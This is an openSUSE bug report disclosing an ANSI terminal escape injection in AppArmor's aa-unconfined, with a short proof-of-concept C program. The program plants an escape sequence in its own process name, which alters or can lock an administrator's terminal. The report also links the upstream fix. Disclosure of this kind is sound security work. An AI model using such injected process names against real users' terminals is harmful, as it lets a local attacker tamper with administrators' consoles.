Bug 1219032

Summary: ANSI terminal injection possible in aa-unconfined
Product: [openSUSE] openSUSE Tumbleweed Reporter: Ricardo Branco <rbranco>
Component: SecurityAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: E-mail List <qa-bugs>
Severity: Normal    
Priority: P5 - None    
Version: Current   
Target Milestone: ---   
Hardware: Other   
OS: Other   
Whiteboard:
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Ricardo Branco 2024-01-20 17:45:37 UTC 
Opened bug upstream: https://gitlab.com/apparmor/apparmor/-/issues/364

The following code displays a X as the title of an ANSI terminal. Without the final '\007' the terminal can be locked up.

The fix is not to trust cmdline in https://gitlab.com/apparmor/apparmor/-/blob/master/utils/aa-unconfined?ref_type=heads#L137 as proc(5) instructs.

$ cat > a.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <err.h>

int main(int argc, char *argv[]) {
	struct sockaddr_in sin;
	int s;

	if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
		err(1, "socket()");

	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = INADDR_ANY;

	if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) < 0)
		err(1, "bind()");

	strcpy(argv[0], "/\033]0;X\007");

	while (1)
		sleep(3600);
}
EOF

$ unset PROMPT_COMMAND

$ cc a.c

$ ./a.out &

$ sudo aa-unconfined
Comment 1 Ricardo Branco 2024-03-25 17:30:54 UTC 
Fixed upstream in https://gitlab.com/apparmor/apparmor/-/merge_requests/1142 and fix present in Tumbleweed.